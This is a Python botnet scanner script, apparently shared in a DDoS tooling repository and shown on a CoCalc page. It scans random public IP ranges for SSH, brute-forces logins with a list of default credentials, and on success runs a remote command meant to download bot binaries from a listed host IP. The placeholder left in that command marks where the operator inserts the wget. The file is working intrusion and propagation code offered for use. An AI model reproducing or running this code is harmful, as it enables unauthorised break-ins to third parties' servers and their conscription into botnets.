CoCalc -- Botnet.py

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/AUTOSCANNER/Botnet.py
⁵⁰³⁸ views
1
#!/usr/bin/env python
2
# -*- coding: utf-8 -*-
3
 
4
# ulimit -n 999999; ulimit -u 999999
5
# sysctl -w fs.file-max=100000
6
# python botnet.py 376 LUCKY x 0 (LUCKY RANGES)
7
# python botnet.py 376 B 113.53 1 (SCANNER EXAMPLE)
8
# python botnet.py 376 RAND x all (IP RANDOMIZATION)
9
# 113.53, 125.26, 125.27, 125, 
10

11
import threading, paramiko, random, socket, time, sys
12

13
paramiko.util.log_to_file("/dev/null") # silents spam of paramiko
14

15
files = [ # Binary names
16
    "cvb",
17
	"cvv",
18
	"dsf",
19
	"fdgxc",
20
	"sdf",
21
	"sdfv",
22
	"xnvx",
23

24
]
25

26
website = "185.112.249.142" # Binary Host IP
27

28
reservedips = [
29
 'http://127.',
30
 'http://0',
31
 'http://10.',
32
 'http://100.64',
33
 'http://100.65',
34
 'http://100.66',
35
 'http://100.67',
36
 'http://100.68',
37
 'http://100.69',
38
 'http://100.70',
39
 'http://100.71',
40
 'http://100.72',
41
 'http://100.73',
42
 'http://100.74',
43
 'http://100.75',
44
 'http://100.76',
45
 'http://100.77',
46
 'http://100.78',
47
 'http://100.79',
48
 'http://100.80',
49
 'http://100.81',
50
 'http://100.82',
51
 'http://100.83',
52
 'http://100.84',
53
 'http://100.85',
54
 'http://100.86',
55
 'http://100.87',
56
 'http://100.88',
57
 'http://100.89',
58
 'http://100.90',
59
 'http://100.91',
60
 'http://100.92',
61
 'http://100.93',
62
 'http://100.94',
63
 'http://100.95',
64
 'http://100.96',
65
 'http://100.97',
66
 'http://100.98',
67
 'http://100.99',
68
 'http://100.100',
69
 'http://100.101',
70
 'http://100.102',
71
 'http://100.103',
72
 'http://100.104',
73
 'http://100.105',
74
 'http://100.106',
75
 'http://100.107',
76
 'http://100.108',
77
 'http://100.109',
78
 'http://100.110',
79
 'http://100.111',
80
 'http://100.112',
81
 'http://100.113',
82
 'http://100.114',
83
 'http://100.115',
84
 'http://100.116',
85
 'http://100.117',
86
 'http://100.118',
87
 'http://100.119',
88
 'http://100.120',
89
 'http://100.121',
90
 'http://100.122',
91
 'http://100.123',
92
 'http://100.124',
93
 'http://100.125',
94
 'http://100.126',
95
 'http://100.127',
96
 'http://169.254',
97
 'http://172.16.',
98
 'http://172.17.',
99
 'http://172.18.',
100
 'http://172.19.',
101
 'http://172.20.',
102
 'http://172.21.',
103
 'http://172.22.',
104
 'http://172.23.',
105
 'http://172.24.',
106
 'http://172.25.',
107
 'http://172.26.',
108
 'http://172.27.',
109
 'http://172.28.',
110
 'http://172.29.',
111
 'http://172.30.',
112
 'http://172.32.',
113
 'http://192.0.0.0',
114
 'http://192.0.0.1',
115
 'http://192.0.0.2',
116
 'http://192.0.0.3',
117
 'http://192.0.0.4',
118
 'http://192.0.0.5',
119
 'http://192.0.0.6',
120
 'http://192.0.0.7',
121
 'http://192.0.2.',
122
 'http://192.88.99.',
123
 'http://192.168.',
124
 'http://198.18.',
125
 'http://198.19.',
126
 'http://198.51.100.',
127
 'http://203.0.113.',
128
 'http://224.',
129
 'http://225'
130
]
131

132

133
passwords = [ # perls/la
134
    "root:root",
135
    "root:admin",
136
    "admin:admin",
137
    "ubnt:ubnt"
138
    "root:1234",
139
    "admin:1234",
140
    "guest:guest",
141
    "user:user",
142
    "test:test",
143
    "pi:raspberry",
144
    "vagrant:vagrant"
145
]
146

147
ascii = '\x1b[1;35m'###########################################################################
148
ascii +='                                                                                \r\n'#
149
ascii +=' ▒███████▒ ▒█████   ███▄    █ ▓█████   ██████ ▓█████  ▄████▄ 0 					 \r\n'#
150
ascii +=' ▒ ▒ ▒ ▄▀░▒██▒  ██▒ ██ ▀█   █ ▓█   ▀ ▒██    ▒ ▓█   ▀ ▒██▀ ▀█  					 \r\n'#
151
ascii +=' ░ ▒ ▄▀▒░ ▒██░  ██▒▓██  ▀█ ██▒▒███   ░ ▓██▄   ▒███   ▒▓█    ▄ 					 \r\n'#
152
ascii +='   ▄▀▒   ░▒██   ██░▓██▒  ▐▌██▒▒▓█  ▄   ▒   ██▒▒▓█  ▄ ▒▓▓▄ ▄██▒					 \r\n'#
153
ascii +=' ▒███████▒░ ████▓▒░▒██░   ▓██░░▒████▒▒██████▒▒░▒████▒▒ ▓███▀ ░					 \r\n'#
154
ascii +=' ░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒░   ▒ ▒ ░░ ▒░ ░▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒  ░					 \r\n'#
155
ascii +=' ░░▒ ▒ ░ ▒  ░ ▒ ▒░ ░ ░░   ░ ▒░ ░ ░  ░░ ░▒  ░ ░ ░ ░  ░  ░  ▒   					 \r\n'#
156
ascii +=' ░ ░ ░ ░ ░░ ░ ░ ▒     ░   ░ ░    ░   ░  ░  ░     ░   ░        					 \r\n'#
157
ascii +='   ░ ░        ░ ░           ░    ░  ░      ░     ░  ░░ ░      					 \r\n'#
158
ascii +=' ░                                                   ░        					 \r\n'#
159
ascii +='                     ~[ ZoneSec Cyber Rapist.]~                                \r\n'#
160
ascii +='\x1b[0m'##############################################################################
161

162
print ascii
163
print sys.argv[0]+' <Threads(MAX: 376)> <A/B/C/ (IP Class)> <Range> <1(slow but effective)/2(fast but less effective)/perl(scans for perlbots/all(scans for everything!>'
164

165
if sys.argv[4] == '1':
166
    passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
167
if sys.argv[4] == '2':
168
    passwords = [ "root:root", "admin:admin" ] #Fast but yet less effective
169
if sys.argv[4] == 'perl':
170
    passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] #perl scanner
171
if sys.argv[4] == 'all':
172
    passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow
173

174
ipclassinfo = sys.argv[2]
175
if ipclassinfo == "A":
176
    ip1 = sys.argv[3]
177
elif ipclassinfo == "B":
178
    ip1 = sys.argv[3].split(".")[0]
179
    ip2 = sys.argv[3].split(".")[1]
180
elif ipclassinfo == "C":
181
    ips = sys.argv[3].split(".")
182
    num=0
183
    for ip in ips:
184
        num=num+1
185
        if num == 1:
186
            ip1 = ip
187
        elif num == 2:
188
            ip2 = ip
189
        elif num == 3:
190
            ip3 = ip
191
class sshscanner(threading.Thread):
192
    global passwords
193
    global ipclassinfo
194
    if ipclassinfo == "A":
195
        global ip1
196
    elif ipclassinfo == "B":
197
        global ip1
198
        global ip2
199
    elif ipclassinfo == "C":
200
        global ip1
201
        global ip2
202
        global ip3
203
    def run(self):
204
        while 1:
205
            try:
206
                while 1:
207
                    thisipisbad='no'
208
                    if ipclassinfo == "A":
209
                        self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
210
                    elif ipclassinfo == "B":
211
                        self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
212
                    elif ipclassinfo == "C":
213
                        self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
214
                    elif ipclassinfo == "LUCKY":
215
			lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97","125.17"]
216
                        self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
217
                    else:
218
                        self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
219
                    for badip in reservedips:
220
                        if badip in self.host:
221
                            thisipisbad='yes'
222
                    if thisipisbad=='no':
223
                        break
224
                self.host=self.host.replace('http://', '')
225
                username='root'
226
                password="0"
227
                port = 22
228
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
229
                s.settimeout(3)
230
                s.connect((self.host, port))
231
                s.close()
232
                ssh = paramiko.SSHClient()
233
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
234
                dobreak=False
235
                for passwd in passwords:
236
                    if ":n/a" in passwd:
237
                        password=""
238
                    else:
239
                        password=passwd.split(":")[1]
240
                    if "n/a:" in passwd:
241
                        username=""
242
                    else:
243
                        username=passwd.split(":")[0]
244
                    try:
245
                        ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
246
                        dobreak=True
247
                        break
248
                    except:
249
                        pass
250
                    if True == dobreak:
251
                        break
252
                badserver=True
253
                stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
254
                output = stdout.read()
255
                if "inet addr" in output:
256
                    badserver=False
257
                websites = [ ]			
258
                if badserver == False:
259
                        print 'Adding:'+username+'<'+password+'>'+self.host+'|'+str(port)
260
                        ssh.exec_command("put ur wget here ignore the shit up top.") #la
261
                        
262
                        time.sleep(15)
263
	                ssh.close()
264
            except:
265
                pass
266

267
for x in range(0,int(sys.argv[1])):
268
    try:
269
        t = sshscanner()
270
        t.start()
271
    except:
272
        pass
273
Product

Resources

Company
